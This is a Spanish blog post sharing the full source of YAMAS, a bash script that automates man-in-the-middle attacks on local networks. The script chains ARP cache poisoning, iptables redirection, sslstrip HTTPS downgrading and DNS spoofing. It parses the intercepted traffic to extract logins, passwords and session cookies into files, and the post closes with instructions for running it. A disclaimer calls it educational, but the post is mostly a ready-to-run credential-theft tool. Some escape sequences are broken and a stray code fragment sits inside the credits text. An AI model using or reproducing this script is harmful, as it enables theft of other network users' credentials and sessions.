YAMAS es una herramienta que tiene como objetivo facilitar los ataques MITM mediante la automatización de todo el proceso de creación y modificación de reenvío IP iptables, para el envenenamiento de la caché ARP (ya sea usando ettercap o arpspoof). El tráfico SSL se evita con el famoso sslstrip 0,9. Si algún script MITM hace eso, Yamas tiene una característica única y apreciada: que analiza los registros como el ataque sigue funcionando, por lo que las credenciales se muestran tal y como se analizó. Además, se puede interactuar con distintas opciones mientras que el ataque se está ejecutando (Escanear la red, pausar el ataque, capturar imagenes, ...)
Video:
link: http://www.youtube.com/watch?v=mXoj4kTCIQM
Además, esta versiona está modificada para que a parte de capturar las creedenciales, tambien capture todas las cookies (y las filtre) en un comodo archivo de texto (Sin mencionar la traducción al español )
[color=#000000]# #!/bin/bash
# Bash script to launch man it the middle attack and sslstrip.
# version 0.9 by comaX
# Traducido por vk496 para seguridadwireless.net
# CookieMod by vk496
version="20130313"
if [ $UID -ne 0 ]; then
echo -e "�33[31Este programa debería ejecutarse como root.
Seguramente fallara.�33[m"
sleep 3
fi
log_output_dir=~
sslstrip_dir=/usr/share/sslstrip
ask_for_install=y
if [ ! -d "$log_output_dir" ]; then
mkdir -p $log_output_dir
fi
# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.
fast_cleanup()
{
echo -e "nn�33[31m ^C Capturado. Limpiando y saliendo.�33[m"
if [[ $looparseid != "" ]];then
kill $looparseid
fi
if [[ $sslstripid != "" ]];then
kill $sslstripid
fi
if [[ $dnsid != "" ]];then
kill $dnsid
fi
if [[ $etterspoofid != "" ]];then
kill $etterspoofid
fi
if [[ "$etter" = "1" ]];then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
echo -e "�33[32m[-] Limpieza realizada con exito !�33[m"
exit 0
}
#Let's define some arguments that can be passed to the script :
#generating grepcred.txt so that it doesn't have to be downloaded each time
#it was originally being downloaded so I could easily fix it, but there has
#been no fix to be done... So why use a file instead of a command line ?
#It's just much more easier this way.
echo -e "credentialnemailnlastnlognmodifiednnamennicknamenpassnpersistentnpwnsessionntextboxnusernwebsite" > /tmp/grepcred.txt
while [ "$1" != "" ];do
case $1 in
-p | --parse)
if [[ $2 == "" ]]; then
echo -e "No se ha especificado ningun archivo de entrada. Saliendo... nuso : $0 -p <file>"
exit 0
fi
clear
echo -e "Analizando $2 para creedenciales.nn"
cat $2 |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = t"$2; getline; print $n"n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = t"$2"n";
else if ($1 ~/available/) print "";
else if ($1 ~/last/) print "";
else print "Login = t"$2}' |
uniq
cat $2 | grep -a -e "cookie :" -e "host :" | awk '/host/&&!t{t=$0} /cookie/&&t{print t;print;t=""}' | awk '{$1=""; $2=""; $3=""; $4=""; print}' | sed '/host/i ' | sed -e 's/^ *//' >/tmp/cookies.txt
exit 0 ;;
-pl) while :
do
clear
echo -e "Analizando $2 para creedenciales.nn"
cat $2 |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = t"$2; getline; print $n"n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = t"$2"n";
else if ($1 ~/available/) print "";
else if ($1 ~/last/) print "";
else print "Login = t"$2}' |
uniq
cat $2 | grep -a -e "cookie :" -e "host :" | awk '/host/&&!t{t=$0} /cookie/&&t{print t;print;t=""}' | awk '{$1=""; $2=""; $3=""; $4=""; print}' | sed '/host/i ' | sed -e 's/^ *//' >/tmp/cookies.txt
sleep 3
done ;;
-e | --etter) echo -e "tVas a usar Ettercap en vez de ARPspoof."
etter="1"
shift
sleep 0.5 ;;
-h | --help) clear
echo -e "Estas ejecutando $0, version $version.
Uso : $0 -h -c -p -e -s -f
-h o --help : Muestra este mensaje de ayuda, aviso legal y sale.
-c o --change: Muestra changelog.
-e : Utilice ettercap en lugar de ARPspoof. Podriamos tener razones propias ...
ARPspoof es el predeterminado.
-p or --parse : Solo analizar un <file>. No utilize caracteres comodines.
Utilice> / output_file para imprimir en un archivo.
-s : Modo invisible. El script no se descarga nada.
-f : Utilice padlock favicon en sslstrip.
�33[31m EXENCION DE RESPONSABILIDAD :�33[m
Este programa esta ha sido creado con el unico proposito del aprendizaje.
No justifico la pirateria y no sere responsable de sus acciones.
Puede enfrentarse a consecuencias legales si utiliza este script
para actividades ilegales.
�33[31m Lo que creo que se debe aprender de este script :�33[m
Este script le enseñara lo facil que es obtener credenciales en linea
sensible y como protegerse de ello, a condicion de que entiende
lo que hace el programa. La mejor manera de entender lo que hace es
buscar en su origen. Esto también le ayudara a entendre algunas
secuencias basicas de comandos shell."
exit 0 ;;
-c | --change)
clear
echo -e "�33[31m Changelog :�33[m
ToDo :
- FakeSSL -> Need help
�33[31mFeatures :�33[m
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Both arpspoof and ettercap are suported
- Network mapping for host discovery.
- Can save "dumped" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file.
- Display ASCII tables for better readability of creds.
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D
- Miscellaneous features
�33[31m Credits :�33[m
Credits go to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.
Special kudos to ShortBuss for something I should have seen a
long time ago (sslstrip before arpspoof) and many little improvements.
And of course, to thif [[ $2 == "" ]]; then
echo -e "No input file given. Quitting. nusage : $0 -p <file>"
exit 0
fie people responsible for the tools I am using in this script.
Please criticize this program or submit ideas on the official thread at
http://tin y url.com/yamas-bt5 or send me a mail at contact.comax@gmail.com"
exit ;;
-s | --silent)
echo "Stealth mode ON"
silent="1"
shift ;;
-f | --fav)
echo "favicon mode ON"
fav="-f"
shift ;;
-t)
time="$4" ;;
*) shift ;;
esac
done
### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
if [[ "$silent" = "1" ]]; then
message="nNo se mostrara ningun mensaje : esta en modo silencioso"
else
message=$(curl --silent -q http://comax.fr/yamas/bt5/message) #store it to variable
fi
if [[ $1 = "-s" || $2 = "-s" ]]; then
echo "Las tablas ASCII no estaran disponibles."
echo "Las tablas ASCII no estan disponibles porqu esta en modo silecioso." > /tmp/ascii
else
wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
fi
### Check for updates !
if [[ "$silent" = "1" ]];then
echo "No se comprueba nuevas versiones : Modo silecioso."
else
changelog=$(curl --silent -q http://comax.fr/yamas/bt5/changelog)
last_version=$(curl --silent -q http://comax.fr/yamas/bt5/version) #store last version number to variable
if [[ $last_version > $version ]];then # Comparing to current version
echo -e "You are running version �33[31m$version�33[m, do you want to update to �33[32m$last_version�33[m? (Y/N)
Last changes are :
$changelog"
read update
if [[ $update = Y || $update = y ]];then
echo "[+] Updating script..."
wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0
chmod +x $0
echo "[-] Script updated !"
if [[ $0 != '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
echo -e "Do you want to install it so that you can launch it with "yamas" ?"
read install
if [[ $install = Y || $install = y ]];then #do not proceed to install if using installed version : updating it already "installed" it over.
cp $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
echo "Script should now be installed, launching yamas !"
sleep 3
yamas
exit 1
else
echo "Ok, continuing with updated version..."
sleep 3
$0
exit 1
fi
fi
sleep 2
$0
exit 1
else
echo "Ok, continuing with current version..."
fi
else
echo "No update available"
fi
fi
### End of update process
### Install process
if [[ ! -e '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
echo "Script is not installed. Do you want to install it ? (Y/N)"
read install
if [[ $install = Y || $install = y ]] ; then
cp -v $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
rm $0
echo "Script should now be installed. Launching it !"
sleep 3
yamas
exit 1
else
echo "Ok, not installing then !"
fi
else
echo "Script instalado"
sleep 1
fi
### End of install process
clear
echo -e "
`YMM' `MM' db `7MMM. ,MMF' db .M"""bgd
VMA ,V ;MM: MMMb dPMM ;MM: ,MI "Y
VMA ,V ,V^MM. M YM ,M MM ,V^MM. `MMb.
VMMP ,M `MM M Mb M' MM ,M `MM `YMMNq.
MM AbmmmqMA M YM.P' MM AbmmmqMA . `MM
MM A' VML M `YM' MM A' VML Mb dM
.JMML..AMA. .AMMA..JML. `' .JMML..AMA. .AMMA.P"Ybmmd" " # <= I love it.
echo -e "===========================================================================
=�33[31m Welcome to Yet Another MITM Automation Script.�33[m =
=�33[31m Use this tool responsibly, and enjoy!�33[m =
= Feel free to contribute and distribute this script as you please. =
= Official thread : http://tin y url.com/yamas-bt5 =
= Check out the help (-h) to see new features and informations =
= You are running version �33[32m$version�33[m =
==========================================================================="
echo -e "�33[36mMensaje del dia :�33[m"
echo -e "$message"
echo
# Starting fresh : reset IP forward and iptables
echo -e "�33[31m [+] Limpiando iptables �33[m"
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Limpiado."
# Defining exit function and other ending features
cleanup()
{
echo
echo -e "�33[31m[+] Matando procesos y reseteando iptables.�33[m"
kill $sslstripid
kill $looparseid
if [[ $drifton = 1 ]]; #if driftnet was used
then
echo -e "�33[31mIMMA KILL THIS DRIFTNET BITCH�33[m" #It's between him and me.
if [[ ! -e $log_output_dir/capture_$(date +%d%m%y) ]]; #check if destination folder exists, since driftnet won't create one nor save images
then
mkdir $log_output_dir/capture_$(date +%d%m%y) #create if needed
fi
cp /tmp/driftnet* $log_output_dir/capture_$(date +%d%m%y) #copy all content from driftnet's temp folder to destination
killall driftnet #kill the unbeliever
elif [[ $drifton = 2 ]]; #if tcpxtract was used
then
killall tcpxtract #kill it...
fi
if [[ "$etter" = "1" ]];then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
echo -e "�33[32m[-] Limpieza realizada con exito !�33[m"
echo -e "nDesea guardar el log para revisarlo mas tarde o deberia ser eliminado? (Y=Guardar)"
echo "(Si desea guardarlo, se alojará en $log_output_dir/$filename.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]];then # double brackets because double condition. || signifies "or"
cp /tmp/$filename.txt $log_output_dir/$filename.txt #moving file
if [ -f "$log_output_dir/$filename.txt" ]; then #check if it exists
echo "Log copiado !" #it does
else echo "Error mientras se copiaba el log. Entra en /tmp/ para $filename.txt" #it does not
fi
else
echo "Archivos temporales no guardados"
fi
echo -e "nDesea guardar las cookies en un archivo? (Y=guardar)"
echo "(Si desea guardarlo, se almacenara en $log_output_dir/cookies.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]];then # double brackets because double condition. || signifies "or"
cp /tmp/cookies.txt $log_output_dir/cookies.txt #moving file
if [ -f "$log_output_dir/cookies.txt" ]; then #check if it exists
echo "Log file copiado !" #it does
else echo "Error al copiar archivo de registro. Mirar /tmp/ for cookies.txt" #it does not
fi
else
echo "Cookies no guardadas"
fi
echo -e "nDesea guardar las contraseñas en un archivo? (Y=Guardar)"
echo "(Si desea guardarlo, se alojará en $log_output_dir/$filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]];then # double brackets because double condition. || signifies "or"
cat /tmp/$filename.txt |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = t"$2; getline; print $n"n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = t"$2"n";
else print "Login = t"$2}' |
uniq >> $log_output_dir/$filename.pass.txt # >> appends to a potential previous file.
if [ -f "$log_output_dir/$filename.pass.txt" ]; then #check if it exists
echo "Contraseñas guardadas !" #it does
else
echo "Error mientras se guardaban las contraseñass" #it does not
fi
else
echo "Guardado de contraseñas omitido."
fi
rm /tmp/$filename.txt
echo -e "nArchivos temporales eliminados."
exit
}
search=$(ip route show | grep src | awk '{ print $1}') #store gateway/24 for whole network mapping to variable
#Si no se pone 'grep src', cogerá la subnet "127.0.0.0/8" (vk496)
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.
rescan ()
{
echo -e "�33[31m"
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discorvey
echo -en "�33[m"
final
}
add_target()
{
echo "Itroduzca la nueva IP para atacar :"
read newip
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
final
}
ascii()
{
clear
cat /tmp/ascii
rm /tmp/ascii
final
}
dns_spoof()
{
### Make Host function###
mkhst()
{
echo "Introduzca su lista de redireccionamiento linea por linea. Termine con #.
Ejemplo : 127.0.0.1 foo.bar.com
Puede usar caracteres comodines."
if [ -e '~/hosts_spoof']; then
rm ~/hosts_spoof
fi
while :
do
read input
echo "$input" >> ~/hosts_spoof
if [[ $input == "#" ]];then
break
fi
done
}
###EOfunc###
echo "Si tiene un archivo host, introduzca su ruta. Si no es así, pulse ENTER."
read gothost
if [[ $gothost != "" ]];then
echo "El archivo de host $gothost será usado."
else
echo -e "Vamos a hacer uno...n"
mkhst
fi
xterm -geometry 90x3-1-1 -T "DNS spoofing" -e dnsspoof -i $iface -f ~/hosts_spoof & dnsid=$!
}
choose_dns()
{
echo "Desea usar Ettercap 'dns_spoof' plugin o dnsspoof (E/D) ? Pulse A para abortar"
read spoofpgm
case $spoofpgm in
E) echo "Usaremos ettercap. Asegurate de haber editado /usr/share/ettercap/etter.dns"
ettercap -D -q -i $iface -T -P dns_spoof & etterspoofid=$! ;;
D) echo "Usaremos dnsspoof."
dns_spoof ;;
a | A) final ;;
*) echo "Opcion incorrecta. Pulse E o D"
choose_dns;;
esac
final
}
misc()
{
echo -e "nHere are the miscellanous features.
1. Image sniffing
2. DNS spoofing
3. Previous menu."
read misc
case $misc in
1) image_menu
final ;;
2) choose_dns ;;
3) final ;;
*) echo "bad choice"
misc ;;
esac
}
image_menu()
{
echo -e "Desea usar driftnet (mostrar imagenes) o tcpxtract ?
1. Tcpxtract (Guarda todas las imagenes a $log_output_dir/capture[date])
2. Driftnet (Muestra todas las imagenes en pantalla y las guarda en $log_output_dir/capture[date])"
read image_choice
case $image_choice in
1) tcpxtract -d $iface -o $log_output_dir/capture_$(date +%d%m%y) > /dev/null & tcpid=$!
drifton=2
echo "tcpxtract se ha ejecutado con el pid $tcpid"
misc ;;
2) driftnet -i $iface -d /tmp/ &> /dev/null &
drifton=1
echo "Driftnet ejecutado."
misc ;;
esac
}
rtparse()
{
echo -e "nnEn este menu puede pausar, reanudar, cerrar o ejecutar
el analisis en vivo (RTP).
1. Pausar RTP (mantiene xterm abierto para que lea, copie-pegue, etc.)
2. Reanudar RTP.
3. Cerrar RTP (detiene y cierra xterm)
4. Re-lanzar RTP
5. Menu anterior."
read rtp
case $rtp in # not sure if this should be quote enclosed...anyone want to help out? It's singular options without a space, so I think the need for quotes is NOT needed??
1) echo -e "�33[33m[+]Pausando...�33[m"
kill -19 $looparseid
echo -e "�33[33m[-]Pausado.�33[m"
rtparse;;
2) echo -e "�33[33m[+]Reanudando...�33[m"
kill -18 $looparseid
echo -e "�33[33m[-]Reanudado.�33[m"
rtparse;;
3) echo -e "�33[31m[+]Cerrando...�33[m"
kill $looparseid
echo -e "�33[33m[-]Cerrado.�33[m"
rtparse;;
4) echo -e "�33[32m[+]Lanzando...�33[m"
xterm -hold -geometry 90x20-1-100 -T Passwords -e $0 -pl /tmp/$filename.txt & looparseid=$!
sleep 2
echo -e "�33[33m[-]Lanzado.�33[m"
rtparse;;
5) echo "Anterior"
final ;;
*) echo -e "�33[31mMala eleccion chaval !�33[mn" #Professional Language =)
rtparse;;
esac
}
final()
{
echo -e "n�33[32mEl ataque se esta ejecutando�33[m. Puede :
1. Reanalizar la red.
2. Añadir objetivo (Inutil si es sobre toda la red).
3. Display ASCII correspondence table.
4. Real-time parsing...
5. Misc features.
6. Quit properly.
Introduzca el numero de la opcion deseada."
read final
case $final in
1) rescan ;;
2) add_target ;;
3) ascii ;;
4) rtparse ;;
5) misc ;;
6) cleanup ;;
*) echo -e "�33[31mMala eleccion tio !�33[mn" #was "motherfucker" during my tests.
final ;;
esac
}
###############################End of functions#############################
# IP forwarding
echo
echo -e "�33[31m [+] Activando IP forwarding... �33[m"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activado."
#Iptables
echo
echo -e "�33[31m [+] Configurando iptables...n �33[m"
echo -en "�33[31m Hacia �33[mque puerto debe ser redirigido el trafico? (por defecto = 8080)"
echo
read -e outport
if [ "$outport" = "" ];then
outport=8080
echo -e "Puerto $outport seleccionado como predeterminado.n"
fi
echo -en "�33[31m Desde �33[mque puerto debe ser redirigido el trafico? (por defecto = 80)"
echo
read -e inport
if [ "$inport" = "" ];then
inport=80
echo -e "Puerto $inport seleccionado como predeterminado.n"
fi
echo -e "n�33[33m El trafico del puerto $inport se redirige al puerto $outport �33[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"
#Sslstrip
echo
echo -e "�33[31m [+] Activating sslstrip... �33[m"
echo "Elija el nombre del archivo : (Por defecto = yamas)"
read -e filename
if [ "$filename" = "" ];then
filename="yamas"
fi
echo -e "�33[33m Sslstrip escucha en el puerto $outport y se guarda el log en /tmp/$filename.txt�33[m"
if [ ! -e '/usr/bin/sslstrip' ];then # If sslstrip isn't installed
if [ ! -x '$sslstrip_dir/sslstrip.py' ];then #if non-installed is not executable
chmod +x $sslstrip_dir/sslstrip.py #make it executable
fi
$sslstrip_dir/sslstrip.py $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$! #launch non-installed
else
sslstrip $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
fi
sleep 4 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
echo
echo -e " [-] Sslstrip esta ejecutandose." # a bit redundant, but who cares?
echo
#Arpspoofing
echo
echo -e "�33[31m [+] Activando ARP envenenamiento de cache... �33[m"
echo
ip route show | awk '(NR == 1) { print "Puerta de enlace :", $3," ", "Interface :", $5}' #Output IP route show user-friendly
iface=$(ip route show | awk '(NR == 1) { print $5}')
gateway=$(ip route show | awk '(NR == 1) { print $3}') #store gateway ip
echo
echo "Escriba la direccion IP de la puerta de enlace o pulse Intro para utilizar $gateway."
read -e gateway
if [ "$gateway" = "" ];then
gateway=$(ip route show | awk '(NR == 1) { print $3}') #restore gateway ip since pressing enter set our var to null
echo -e "$gateway seleccionado como predeterminado.n"
fi
echo
echo "Que interfaz le gustaria usar? Debe coincidir con puerta de enlace IP como se muestra arriba. Pulse Intro para usar $iface."
read -e iface
if [ "$iface" = "" ];then
iface=$(ip route show | awk '(NR == 1) { print $5}') #store default interface
echo -e "$iface seleccionado como predeterminado.n"
fi
echo -e "r"
echo -e "Nos concentraremos en toda la red de forma predeterminada. Usted puede �33[4mD�33[mescubrir hosts e introducir IP(s) de forma manual �33[4mD�33[m..
Pulsa INTRO para elegir por defecto."
read -e choicearp
echo
if [[ $choicearp = "D" || $choicearp = "d" ]];then
echo -e "nDesea escanear la red en busca de hosts activos? (Y/N) [Esto puede tardar hasta 30 segundos, sea paciente]"
read -e hosts
echo -e "�33[31m "
if [[ $hosts = "Y" || $hosts = "y" ]];then
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
echo -e "�33[m " # switch color back to white
else
echo -e "�33[m "
fi
echo -e "Por favor, introduzca las IP(s) de la siguiente forma : IP1 IP2 IP3...
�33[31m Cuidado! Esto se generan tantas ventanas como blancos de entrada y podría ralentizar actuaciones. Si ese fuera el caso, a continuacion, utilizar la orientación de toda la red.�33[m "
arpspoofi()
{ # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ];do
xterm -geometry 90x3-1-1 -T "Envenenando $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
shift
done
echo -e "�33[33m Lanzando $parameters en $gateway desde $iface con ARPspoof�33[m"
}
ettercapi()
{ # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ];do
xterm -geometry 90x3-1-1 -T "Envenenando $1" -e ettercap -o -q -i $iface -T -M arp /$gateway/ /$1/ 2>/dev/null & sleep 2
shift
done
echo -e "�33[33m Lanzando $parameters en $gateway desde $iface con Ettercap�33[m"
}
read -e parameters
if [[ "$etter" = "1" ]];then
ettercapi $parameters
else
arpspoofi $parameters
fi
else
if [[ "$etter" = "1" ]];then
xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp // // &
sleep 2
echo -e "�33[33m Lanzando sobre toda la red en $gateway desde $iface con Ettercap�33[m"
else
xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
sleep 2
echo -e "�33[33m Lanzando sobre toda la red en $gateway desde $iface con ARPspoof�33[m"
fi
fi
echo -e "[-] ARP envenenamiento de cache se ha ejecutado. �33[31m Deja la(s) nueva(s) ventana(s) ejecutandose. �33[m"
echo -e "n�33[32m El ataque debería estar ejecutandose dentro de poco, disfruta.�33[m"
xterm -hold -geometry 90x20-1-100 -T Passwords -e $0 -pl /tmp/$filename.txt & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas. [/color] Para usarlo, guardamos el code en un archivo (yamas por ejemplo)
Le damos permisos de ejecución
chmod +x yamas
Y lo abrimos:
./yamas -s
Pagina del proyecto: http://comax.fr/yamas.php
Salu2
0 comentarios:
Publicar un comentario